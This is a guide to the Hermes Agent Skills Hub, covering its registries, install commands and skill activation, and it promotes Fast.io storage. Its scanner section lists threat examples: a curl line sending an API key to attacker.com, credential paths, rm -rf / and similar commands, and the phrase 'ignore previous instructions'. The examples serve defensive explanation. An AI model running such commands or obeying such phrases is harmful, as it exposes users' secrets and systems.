Hermes Agent Skills Hub: Browse and Install 672 Community Skills

Nous Research Hermes Agent ships with a Skills Hub that aggregates 672 skills from four distinct registries. Each registry carries a different trust level and serves a different purpose, so understanding the breakdown matters before you start installing anything.

Built-in (89 skills): These ship with Hermes Agent itself. They cover core functionality like ComfyUI image generation, GitHub workflow automation, HuggingFace model integration, and LLM fine-tuning through Axolotl, TRL, and Unsloth. Built-in skills are always trusted and require no installation.

Official Optional (62 skills): Maintained in the Hermes Agent repository under optional-skills/. These bypass standard security scanning because they are reviewed by the Nous Research team. Think of them as vetted extensions that did not make the default bundle: productivity integrations for Airtable, Google Workspace, and Linear fall here.

Community (521 skills): The largest registry by far. Community skills come from independent developers and range from sports betting trackers to incident management systems to cross-platform capability libraries like wondelai/skills (380+ GitHub stars). Community skills always go through security scanning before installation.

Third-party (Anthropic + LobeHub): The Hub also connects to the Anthropic skills collection (16 skills, including 753+ structured cybersecurity skills mapped to MITRE ATT&CK) and the LobeHub marketplace (505 skills). These external registries are searched through pluggable adapters that normalize the installation flow.

All skills follow the agentskills.io open standard, meaning a skill written for Claude Code, Cursor, or Codex CLI works in Hermes without modification. The format is straightforward: a SKILL.md file with YAML frontmatter (name, description, version, platform constraints) and markdown instructions in the body.

The Skills Hub organizes its 672 skills into 17 functional categories. Here is the full breakdown with counts:

The "Other" category is large because many community contributions have not been re-categorized yet. The category comes from the metadata.hermes.category field in each skill's YAML frontmatter, and community contributors do not always set it.

Software Development dominates the named categories because that is where Hermes Agent sees the heaviest usage. Skills in this category handle everything from generating pull request descriptions to running automated code reviews to managing CI/CD pipelines across GitHub Actions, GitLab CI, and Jenkins.

Every skill from an external source passes through the Skills Guard scanner before installation. The scanner runs regex-based static analysis against 65+ threat rules organized into 8 categories:

1. Data exfiltration: Detects curl, wget, or fetch calls that interpolate environment variables containing KEY, TOKEN, or SECRET strings. A skill that runs curl -H "Authorization: $API_KEY" https://attacker.com gets flagged immediately.

2. Credential access: Catches references to sensitive directories like ~/.ssh, ~/.aws, and ~/.hermes/.env. Skills should not need access to your SSH keys or cloud credentials.

3. Prompt injection: Flags instructions that attempt to override system behavior, such as "ignore previous instructions" or role hijacking patterns. This prevents skills from manipulating the agent into bypassing safety controls.

4. Destructive commands: Catches shell commands like rm -rf /, mkfs, and dd that could damage the host system.

5. Obfuscation: Identifies base64-encoded payloads, hex-encoded strings, and other encoding patterns that might hide malicious intent.

6. Hardcoded secrets: Flags API keys, passwords, and tokens embedded directly in skill files.

7. Network abuse: Detects unusual network patterns like port scanning, DNS tunneling, or connections to known malicious endpoints.

8. Supply chain: Catches dependency confusion patterns, typosquatting package names, and unexpected package installations.

The scanner produces one of three verdicts for each finding: safe, caution, or dangerous. What happens next depends on the skill's trust level:

The --force flag lets you override caution and warn-level blocks, but it cannot bypass dangerous verdicts. This is a deliberate design choice: you can accept known risks, but Hermes will not let you install something that looks actively malicious without deeper intervention.

Store Your Hermes Agent Skill Outputs in One Place

Fast.io gives Hermes Agent deployments 50 GB of intelligent workspace storage, no credit card required. Upload skill outputs, search them by meaning, and hand off to collaborators.

Sign Up Free

Hermes Agent supports six installation sources, each with its own syntax. The base command is always hermes skills install, followed by a source-specific identifier.

Official optional skills:

hermes skills install official/security/1password

These pull from the optional-skills/ directory in the Hermes repository and skip security scanning.

skills.sh marketplace:

hermes skills install skills-sh/vercel-labs/agent-skills/skill-name

The skills.sh adapter acts as a proxy, searching its index and delegating file fetching to GitHub.

Well-known endpoints:

hermes skills install well-known:https://site.com/.well-known/skills/mintlify

Any website can host skills at a standardized .well-known/skills/ path. Hermes discovers and installs them directly.

GitHub repositories:

hermes skills install openai/skills/k8s

Point at any GitHub repo containing SKILL.md files. The GitHub adapter uses the Contents API and auto-marks openai/skills and anthropics/skills as trusted.

Direct URLs:

hermes skills install https://example.com/SKILL.md

Fetch and install a single skill file from any URL. Useful for testing skills before publishing them to a registry.

Third-party marketplaces (ClawHub, LobeHub):

ClawHub and LobeHub skills appear in search results when you run hermes skills browse or hermes skills search. The adapters normalize the installation flow so you do not need to interact with each marketplace separately.

Beyond installation, the CLI gives you a full management toolkit:

• hermes skills browse opens the interactive skill browser
• hermes skills search [query] searches across all connected registries
• hermes skills inspect [path] previews a skill before installing
• hermes skills list shows installed hub skills
• hermes skills check detects upstream updates
• hermes skills update reinstalls updated skills

Name resolution is a nice convenience. Instead of typing the full registry path, you can often install by short name: hermes skills install pptx resolves to the right skill automatically.

Installed skills live in ~/.hermes/skills/ with a consistent directory structure: each skill gets a folder containing SKILL.md (the instructions), plus optional references/, templates/, scripts/, and assets/ directories.

Not every installed skill needs to be active all the time. Hermes Agent uses conditional activation to show and hide skills based on the current environment.

Three activation controls determine visibility:

Platform restrictions limit skills to specific operating systems. A skill with platforms: [macos] in its frontmatter will not appear on Linux or Windows. This prevents macOS-specific Shortcuts integrations from cluttering the skill list on a Linux server.

Toolset requirements (requires_toolsets) make a skill visible only when specific tools are available. A Docker management skill that requires the Docker CLI will not show up if Docker is not installed.

Fallback skills (fallback_for_toolsets) activate only when listed tools are absent. The built-in duckduckgo-search skill uses this pattern: it appears automatically when premium web search tools are unavailable, providing a free alternative without manual configuration.

This progressive disclosure pattern also helps with token efficiency. Hermes starts each session with only skill names, descriptions, and file paths in context. The full SKILL.md instructions load only when the agent decides to use a specific skill. For a hub with 672 skills, this keeps the context window from being overwhelmed by instructions the agent will never use.

Skills also support custom configuration through the frontmatter:

metadata:
  hermes:
    tags: [devops, kubernetes]
    category: devops
    requires_toolsets: [kubectl]
    config:
      - key: cluster.namespace
        default: default

Configuration keys let skill authors expose tunable parameters without requiring users to edit the SKILL.md directly. A Kubernetes skill might let you set a default namespace. A translation skill might let you configure target languages.

One important constraint: the Skills Hub is exclusively user-operated. Agents cannot autonomously install, modify, or delete skills. This prevents a runaway agent from expanding its own capabilities without human oversight. However, agents can create procedural memory through the skill_manage tool after completing complex workflows of five or more tool calls. These agent-created skills are scanned only when skills.guard_agent_created is enabled.

Skills generate output. A research skill produces reports. A code review skill generates analysis files. An MLOps skill creates training configurations and model checkpoints. Where those outputs go matters, especially when you are running Hermes Agent on a server, inside Docker, or across machines.

Local storage works for single-user setups: skill outputs land in the working directory or a configured path, and you access them directly. But this approach breaks down when you need to share outputs with collaborators, hand off agent work to a client, or access files from a different machine.

Cloud storage platforms solve the sharing problem, but most treat files as passive blobs. You upload a file, you download a file, and there is no intelligence layer on top. Fast.io takes a different approach by treating storage as an intelligent workspace. When you upload skill outputs to a Fast.io workspace, the files are automatically indexed for semantic search through Intelligence Mode. You can ask questions about your agent's output, search by meaning rather than filename, and get cited answers drawn from the actual content.

For Hermes Agent deployments, the practical workflow looks like this: skills write output files to a local directory, then the agent uploads them to a Fast.io workspace using the MCP server (available at /mcp for Streamable HTTP or /sse for legacy connections). From there, collaborators access the workspace through the browser, the API, or their own MCP-connected agents. Ownership transfer lets an agent build out a workspace and hand it to a human client while retaining admin access.

The free agent tier gives you 50 GB of storage, 5,000 credits per month, and 5 workspaces with no credit card required. For teams running Hermes Agent across projects, each project can get its own workspace with separate permissions and audit trails.

Other storage options worth considering for different use cases:

• S3 or GCS for raw artifact archival at scale, particularly model checkpoints and training datasets
• GitHub for version-controlled skill files and configurations
• Local NAS for air-gapped environments where cloud storage is not an option

The choice depends on whether you need collaboration features, semantic search, or just raw capacity. For skill outputs that humans need to review, search, and act on, an intelligent workspace gives you more than a file bucket.